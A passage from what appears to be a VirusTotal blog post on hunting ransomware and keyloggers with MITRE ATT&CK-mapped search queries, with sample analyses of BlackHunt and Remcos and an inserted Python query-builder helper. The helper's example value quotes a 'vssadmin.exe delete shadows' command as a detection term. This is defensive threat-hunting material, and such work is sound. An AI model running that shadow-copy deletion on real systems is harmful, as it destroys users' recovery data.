style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\&lt;user&gt;\AppData\Roaming\qmacro</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\&lt;user&gt;\AppData\Roaming\mymacro</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\&lt;user&gt;\AppData\Roaming\MacroCommerce</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\&lt;user&gt;\AppData\Roaming\Plugin</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\&lt;user&gt;\AppData\Roaming\Microsoft</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Windows\SysWow64</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Program
Files (x86)</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Program
Files (x86)\Google</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Program
Files (x86)\Mozilla Firefox</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Program
Files (x86)\Microsoft</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Program
Files (x86)\Common Files</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Program
Files (x86)\Internet Download Manager</span></p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Local</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Local\Temp</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Local\Microsoft</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Users\<user>\AppData\Local\Google</span>
</p>
</td>
</tr>
<tr style="height: 15.75pt;">
<td
style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 0pt 2pt 0pt; vertical-align: bottom;">
<p dir="ltr"
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">C:\Windows\Temp</span>
</p>
</td>
</tr>
</tbody>
</table> </div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
/*font-weight: bold;*/
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-fields {
background: #86aaf9;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
table.no-spacing {
border-spacing:0; /* Removes the cell spacing via CSS */
border-collapse: collapse; /* Optional - if you don't want to have double border where cells touch */
}
.pmargin {
margin: 0;
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
pre {
background: #f4f4f4;
border: 1px solid #ddd;
border-left: 3px solid #7ad3ff;
color: #666;
page-break-inside: avoid;
font-family: monospace;
font-size: 15px;
line-height: 1.6;
margin-bottom: 1.6em;
max-width: 100%;
overflow: auto;
padding: 1em 1.5em;
display: block;
word-wrap: break-word;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>Joseliyo Sánchezhttp://www.blogger.com/profile/15205592295367780978noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-81894513007353853282024-02-21T10:46:00.008+01:002024-02-22T09:43:43.840+01:00Following MITRE's footsteps in analyzing malware behavior<div class="interval_12">
The <b><a href="https://attack.mitre.org/" target="_blank">MITRE</a></b> framework helps all defenders speak the same language regarding attackers' modus operandi. VirusTotal provides multiple data points where MITRE's Tactics and Techniques are dynamically extracted from samples when detonated in our sandboxes.
In particular, samples' MITRE mapping can be found under the <b>BEHAVIOR</b> tab of a file's report. This data is searchable in <b><a href="https://docs.virustotal.com/docs/virustotal-intelligence-introduction" target="_blank">VirusTotal Intelligence</a></b> (VTI) with the help of a set of specific <a href="https://docs.virustotal.com/docs/file-search-modifiers" target="_blank">file search modifiers</a>.
</div>
<div class="interval_12">
In this article, we'll illustrate how security analysts can leverage MITRE for malware detection and <b>behavior</b>-based hunting for ransomware and keylogger samples.
</div>
<br />
<h2 style="text-align: left;">Hunting for Ransomware</h2>
<div class="interval_12">
The security industry historically identified a set of <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf" target="_blank">commonly used techniques</a> in <b>Ransomware</b> campaigns, including <a href="https://attack.mitre.org/techniques/T1490/" target="_blank">inhibiting the system recovery</a> and <a href="https://attack.mitre.org/techniques/T1083/" target="_blank">discovering local files</a> and <a href="https://attack.mitre.org/techniques/T1135/" target="_blank">network shares</a> for later <a href="https://attack.mitre.org/techniques/T1486/" target="_blank">data encryption</a>, usually combined with <a href="https://attack.mitre.org/tactics/TA0010/" target="_blank">exfiltration</a> and/or <a href="https://attack.mitre.org/tactics/TA0011/" target="_blank">Command and Control</a> techniques.
</div>
<div class="central_img width_60 interval_12">
<img src="https://lh7-us.googleusercontent.com/Sfy6VIt1uPPGgGIT7Z4OOEy4n5e4EGFnrUc8gJ2vmA4iy11rIrhJpPX6OIwPyY_YPjBnUDV1DIMhp92EosShhWx7NOqD12EJRBmwiiMDHgVRZa9fn1HlU9vI9pkjwXtUWolJGT-bOSmDBKQYbkWNsZfo6svqfKZj37nls0NtB7rcyZYbDoopJBThzBuETUk" />
<p><i>Common TTPs of modern ransomware groups by <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf" target="_blank">Kaspersky</a></i></p>
</div>
<div class="interval_12">In VT Intelligence we can use two search modifiers to query file behavior mapped to <a href="https://attack.mitre.org/" target="_blank">MITRE ATT&CK</a>:
</div>
<div class="interval_12">
<ul>
<li><b>"attack_tactic"</b> search modifier followed by the <a href="https://attack.mitre.org/tactics/enterprise/" target="_blank">MITRE Tactic ID</a> returns the list of files that, based on our sandbox analysis reports, execute techniques under the specified tactic. For example:
<ul>
<li><a href="https://www.virustotal.com/gui/search/attack_tactic%253A%2520TA0040/files" target="_blank">attack_tactic: TA0040</a></li>
<li><a href="https://www.virustotal.com/gui/search/attack_tactic%253A%2520TA0007/files" target="_blank">attack_tactic: TA0007</a></li>
<li><a href="https://www.virustotal.com/gui/search/attack_tactic%253A%2520TA0010/files" target="_blank">attack_tactic: TA0010</a></li>
<li><a href="https://www.virustotal.com/gui/search/attack_tactic%253A%2520TA0011/files" target="_blank">attack_tactic: TA0011</a></li>
</ul>
</li>
<li><b>"attack_technique"</b> search modifier followed by the <a href="https://attack.mitre.org/techniques/enterprise/" target="_blank">MITRE Technique ID</a> returns the list of files that, based on our sandbox analysis reports, execute the specified technique. For example:
<ul>
<li><a href="https://www.virustotal.com/gui/search/attack_technique%253A%2520T1490/files" target="_blank">attack_technique: T1490</a></li>
<li><a href="https://www.virustotal.com/gui/search/attack_technique%253A%2520T1083/files" target="_blank">attack_technique: T1083</a></li>
<li><a href="https://www.virustotal.com/gui/search/attack_technique%253A%2520T1135/files" target="_blank">attack_technique: T1135</a></li>
<li><a href="https://www.virustotal.com/gui/search/attack_technique%253A%2520T1486/files" target="_blank">attack_technique: T1486</a></li>
</ul>
</li>
</ul>
</div>
<div class="interval_12">
In addition to the <b>"attack_tactic"</b> and <b>"attack_technique"</b> modifiers, VirusTotal provides further behavior modifiers for procedure-based queries; they are listed in <b><a href="#apendix">Appendix I - Behavior search modifiers</a></b> at the end of this post.
</div>
<div class="interval_12">
Let's work through an example. We want to find samples that combine a set of ransomware-related techniques with the <b>"behavior:<a href="https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptencrypt" target="_blank">CryptEncrypt"</a></b> operating system API call (see <a href="#apendix">Appendix I</a> for details). Additionally, we restrict the <b>entity</b> we are interested in (<b>files</b>) and use the first submission date (<b>fs</b>) to filter out files submitted before 2024-01-01.
</div>
<div class="interval_12">
The resulting query is as follows:
</div>
<div class="interval_12">
<a href="https://www.virustotal.com/gui/search/entity%253Afile%2520attack_technique%253AT1490%2520and%2520attack_technique%253AT1083%2520and%2520attack_technique%253A%2520T1135%2520%2520behavior%253ACryptEncrypt%2520%2520fs%253A2024-01-01%252B/files" target="_blank">entity:file attack_technique:T1490 and attack_technique:T1083 and attack_technique: T1135 behavior:CryptEncrypt fs:2024-01-01+</a>
</div>
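<div class="interval_12">Queries like the one above are usually generated from a curated TTP list rather than typed by hand. The following Python helper is an added example, not part of this post or of VirusTotal's tooling: it composes a query from technique, tactic and behavior terms using only the modifiers introduced above (entity, fs, attack_tactic, attack_technique, behavior and the behavior_* modifiers of Appendix I), validates the ATT&CK identifiers before they reach the search box, and emits the matching /gui/search/ link. The function names are this example's own, and the link encoding rule (the query percent-encoded twice, which is what the links in this post show) is inferred from those links rather than documented.</div>

```python
"""Build VT Intelligence TTP queries and the /gui/search/ links for them.

Added example, not VirusTotal's own tooling. It uses only modifiers shown in
this post (entity, fs, attack_tactic, attack_technique, behavior and the
behavior_* modifiers of Appendix I). The helper names and the "encode twice"
rule for GUI links are inferred from the links in the post and are an
assumption, not documented behaviour.
"""
import re
from urllib.parse import quote

TACTIC_RE = re.compile(r"^TA\d{4}$")
TECHNIQUE_RE = re.compile(r"^T\d{4}(\.\d{3})?$")
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def _validated(values, pattern, kind):
    """Reject malformed ATT&CK ids up front: a typo such as 'TA040' would
    otherwise silently match nothing instead of failing."""
    for v in values:
        if not pattern.match(v):
            raise ValueError(f"malformed {kind} id: {v!r}")
    return list(values)


def _value(text):
    """Quote a modifier value containing spaces or backslashes, as the
    Appendix I examples do; bare identifiers such as CryptEncrypt stay bare."""
    return text if re.fullmatch(r"[\w.\-*]+", text) else f'"{text}"'


def build_query(techniques=(), tactics_any=(), behaviors=(), extra=(),
                entity="file", first_seen_after=None):
    """Compose a query: every technique, behavior and extra term is ANDed
    (VTI ANDs space-separated terms), tactics_any becomes an OR group as in
    the keylogger query of the post, and fs:<date>+ keeps only files first
    submitted on or after that date. `extra` holds (modifier, value) pairs
    such as ("behavior_processes", "\\\\vssadmin.exe delete shadows ...")."""
    terms = [f"entity:{entity}"]
    terms += [f"attack_technique:{t}"
              for t in _validated(techniques, TECHNIQUE_RE, "technique")]
    tactics = _validated(tactics_any, TACTIC_RE, "tactic")
    if len(tactics) == 1:
        terms.append(f"attack_tactic:{tactics[0]}")
    elif tactics:
        terms.append("(" + " OR ".join(f"attack_tactic:{t}" for t in tactics) + ")")
    terms += [f"behavior:{_value(b)}" for b in behaviors]
    terms += [f"{modifier}:{_value(value)}" for modifier, value in extra]
    if first_seen_after:
        if not DATE_RE.match(first_seen_after):
            raise ValueError(f"fs expects YYYY-MM-DD, got {first_seen_after!r}")
        terms.append(f"fs:{first_seen_after}+")
    return " ".join(terms)


def gui_search_url(query):
    """The search links in this post carry the query percent-encoded twice
    (':' -> '%3A' -> '%253A'), leaving only letters, digits and _.-~()*
    untouched. Encoding twice with that safe set reproduces those links."""
    encoded = quote(quote(query, safe="()*"), safe="()*")
    return f"https://www.virustotal.com/gui/search/{encoded}/files"


# The two queries of this post, rebuilt from structured input.
RANSOMWARE_QUERY = build_query(techniques=["T1490", "T1083", "T1135"],
                               behaviors=["CryptEncrypt"],
                               first_seen_after="2024-01-01")
KEYLOGGER_QUERY = build_query(techniques=["T1056.001"],
                              tactics_any=["TA0011", "TA0010"],
                              first_seen_after="2024-02-15")

if __name__ == "__main__":
    for q in (RANSOMWARE_QUERY, KEYLOGGER_QUERY):
        print(q)
        print("   ", gui_search_url(q))
```

<div class="interval_12">Because every term is validated and quoted by the helper, a TTP profile kept in version control can be turned into a query and a shareable link without hand-editing; <b>tactics_any</b> produces the OR-grouped form used by the keylogger query later in this post, and <b>extra</b> takes the Appendix I modifiers verbatim.</div>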
<div class="central_img width_100 interval_12">
<img src="https://lh7-us.googleusercontent.com/CJODsRgXlRO5DIZJ9ALfH7vHfk1vrPeMrLeKyfHYyE6aEXcwOokaQnXdkAjPhAJOAKBCLYf2362tKYNFTahlJB2ROe-g7fjDU7VTHj46JPVJR2e1YIEFFYNNfShujhDgGOu_UNLIg7MBUVT4vCAyuSdzWPPtX0R3UoafZDZ9vmCQg3YHAa0YSpHNPk8kcto" />
</div>
<br/>
<div class="interval_12">
Let's analyze in more detail one of the files returned by the query (<a href="https://www.virustotal.com/gui/file/35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab/detection" target="_blank">35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab</a>).
According to the community, the file belongs to a <b>BlackHunt</b> ransomware campaign that <a href="https://vulners.com/rapid7blog/RAPID7BLOG:AD81B8AC3BA63D8024571A2656967360" target="_blank">compromised multiple companies in Paraguay</a>.
</div>
<div class="interval_12">
Its <a href="https://www.virustotal.com/gui/file/35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab/behavior" target="_blank">BEHAVIOR report tab</a> provides details on the techniques detected during the sample's detonation:
</div>
<div class="interval_12">
<ul>
<li><div class="interval_12"><b>T1490</b> (<b>Inhibit System Recovery</b>): the sample deletes the <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service" target="_blank">shadow copies</a> (as highlighted in the <b>Capabilities</b> section below) and also modifies Windows boot settings via <a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit" target="_blank">bcdedit</a>.</div>
<div class="central_img width_60 interval_12">
<a href="https://www.virustotal.com/gui/file/35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab/behavior" target="_blank">
<img src="https://lh7-us.googleusercontent.com/GkWcs4g1wyGjtX7Gim5nkkscFYUL3Ds9K7Ht4xannQdzbeuaHirXpHgJ2hi1Hrmm-gj7tHuDftp_GHp-S2iC4bgyM24tKiI_qZ9Au-S0hIXKYxJ4nhE_doq4GiJt2XiHDMsQ4f3fSDo83JM2wcLHM3-nFlHMS7-s1hkk-zDtSIoIIKAr1un5SnEdoy9E0Gs" />
</a>
</div>
</li>
<li><div class="interval_12"><b>T1083</b> and <b>T1135</b>: the sample runs discovery routines to enumerate local files and directories as well as network shares.</div>
<div class="central_img width_30 interval_12">
<a href="https://www.virustotal.com/gui/file/35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab/behavior" target="_blank">
<img src="https://lh7-us.googleusercontent.com/oKZGnV7KWtn9u0Yy8MnMtlCZwIGVXUXOBwFdPWAPW00neqvP8A38MPANlmR4bGjLH219ET8GYO8p4dIkU1KSa54QA7ZEykUw5n7XgolaBb3rixmk81BRH4gyGiwH-cjqNZO-OJrpAH94B8U1TX6xe2O4UpvHnxge268SlAtNx6egYLmq17Jz7CEVH5yyguk" />
</a>
</div>
</li>
<li><div class="interval_12">The encryption process is visible through the <a href="https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptencrypt" target="_blank">CryptEncrypt</a> operating system API call, functionality provided by <b>Advapi32.dll</b> and visible under the file's <a href="https://www.virustotal.com/gui/file/35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab/details" target="_blank">DETAILS tab</a>.</div>
<div class="central_img width_30 interval_12">
<a href="https://www.virustotal.com/gui/file/35619594724871138875db462eda6cf24f2a462e1f812ff27d79131576cd73ab/behavior" target="_blank">
<img src="https://lh7-us.googleusercontent.com/GxvYOSdtoJ1hxfTpVPsWoyRC8Ik-qtVZajTc2QrekN_29V8_YHRz5tc357B4L2jen-Te-IAJDToYxV6aY27TTeIJrg9w2EqrcGtXksE2T1uoTfHqiaK1kVLlQfUUN40IpToKphY01wbEkX58H1ygvhkIhmqwnp2OtWavnAV275sW_AK_g_UxKAoZ3DAq4yg" />
</a>
</div>
</li>
</ul>
</div>
<br/>
<h2 style="text-align: left;">Hunting for Keyloggers</h2>
<div class="interval_12">
<b>Keyloggers</b> are a particular form of spyware designed to steal user data. They commonly share some MITRE tactics, including <a href="https://attack.mitre.org/tactics/TA0009/" target="_blank">collecting data</a> and/or <a href="https://attack.mitre.org/tactics/TA0007/" target="_blank">discovering data</a> for later <a href="https://attack.mitre.org/tactics/TA0010/" target="_blank">exfiltration</a> and/or <a href="https://attack.mitre.org/tactics/TA0011/" target="_blank">Command and Control</a> communication.
</div>
<div class="interval_12">
For our VTI query we will specify the <a href="https://attack.mitre.org/techniques/T1056/001/" target="_blank">T1056.001: Input Capture: Keylogging</a> sub-technique of the Collection tactic, which identifies keystroke interception. Additionally, we use the first submission time condition (<b>fs</b>) and either the <b>Command and Control</b> or the <b>Exfiltration</b> tactic (<b>attack_tactic</b>), since we are not really interested in restricting the way the data leaves the victim environment.
</div>
<div class="interval_12">
<a href="https://www.virustotal.com/gui/search/attack_technique%253AT1056.001%2520(attack_tactic%253ATA0011%2520OR%2520attack_tactic%253ATA0010)%2520%2520fs%253A2024-02-15%252B/files" target="_blank">attack_technique:T1056.001 (attack_tactic:TA0011 OR attack_tactic:TA0010) fs:2024-02-15+</a>
</div>
<div class="central_img width_100 interval_12">
<img src="https://lh7-us.googleusercontent.com/-B4K35DvGOsz_IIGSlWO5eRuPTx-OEhP08ahdtobWk0LbRz-Bt3Irdr4y1sbbHVmPIUzwQ7aySSTy6fy0PArgeRKC6jcBRp00g3HumoUhcPLN31Vm5KmBDlDRm7F8vGbqR3ZILBRLfeWcvB5XbJbuBv52yRHQT9HGGzcJk9Nu0MhNTm2jqnNMl5ADWPgJUI" />
</div>
<br/>
<div class="interval_12">
One of the retrieved files (<a href="https://www.virustotal.com/gui/file/975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5/" target="_blank">975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5</a>), with a 25 out of 71 AV detection ratio, is cataloged as <b><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos" target="_blank">Remcos</a></b>, a commercial Remote Access Tool with keylogger capabilities among many others, which has been used by several <a href="https://www.virustotal.com/gui/file/975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5/community" target="_blank">Threat Actors</a>.
</div>
<div class="central_img width_60 interval_12">
<a href="https://www.virustotal.com/gui/file/975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5/details" target="_blank">
<img src="https://lh7-us.googleusercontent.com/GsrIzvLh4clPjXTI-wtMyXA60VmHMhT4udY_kIwH48EKWbBRF3uDeuEMRV5P2mzqj-fn5xOD1xyit9WcJW4IYOamF2IxNcfnwhujYIe8A8s5--YaYHh2cH1rXyOCqoSmzmvOR29bk1XGBkPcZkF2ZEfyjEuO3wu1HP5fn9oZUvNdyTUQg5Ew3yaYU4BjZA4" /> </a>
</div>
<div class="interval_12">
On its <a href="https://www.virustotal.com/gui/file/975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5/behavior" target="_blank">BEHAVIOR tab</a>, we can see details on the <b>keystroke</b> interception performed via the <a href="https://resources.infosecinstitute.com/topics/hacking/keyloggers-how-they-work-and-more/" target="_blank">polling method</a>. The report also reveals additional functionality, including capturing <b>screenshots</b>, reading the victim's <b>clipboard</b> and retrieving the <b>geographical location</b> of the abused device.
</div>
<div class="interval_12 central_img_set">
<a href="https://www.virustotal.com/gui/file/975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5/details" target="_blank">
<img class="width_15" style="display:inline-block;"
src="https://lh7-us.googleusercontent.com/oVUN_Y5ynmn3F4nWGc_UsJekYSEgb20gNrjVpih3BA98sdC3C_GrrKH-f0TwLNAFHnIm9AhMojZNKFKE-ek4xbQk2VNrYE0tSGzRwA1jPhryglQMULHcDI4oM7fBxW9BdO1SYLXvbmX6Zrbd0TJDCX21OLB32byPjZnjt9tAHYevpU3MhMC57MP_qBJpAnU">
</a>
<a href="https://www.virustotal.com/gui/file/975b67e75c046e95b1f418c2db85a726dc5d38c21853c5446393b9805c6d1bd5/behavior" target="_blank">
<img class="width_60" style="display:inline-block;"
src="https://lh7-us.googleusercontent.com/dyRx0PhSvYzDjYGUS2h5W4kwWkNIx3I6axLfGytWY5kvewsw8XaPj2co5P8WAqAT_pxnJVrtldRLKXOVRlfQTzQOtNo90LVrjpqn1vm_tz-5QHxJ7L1nj_HOPtvGcVPAuUW7jIqSCkfEREbshJfj1lm-jzp-QhIjq0sGV26S5Lrzp7VGL8pAkhayd4xDA3U">
</a>
</div>
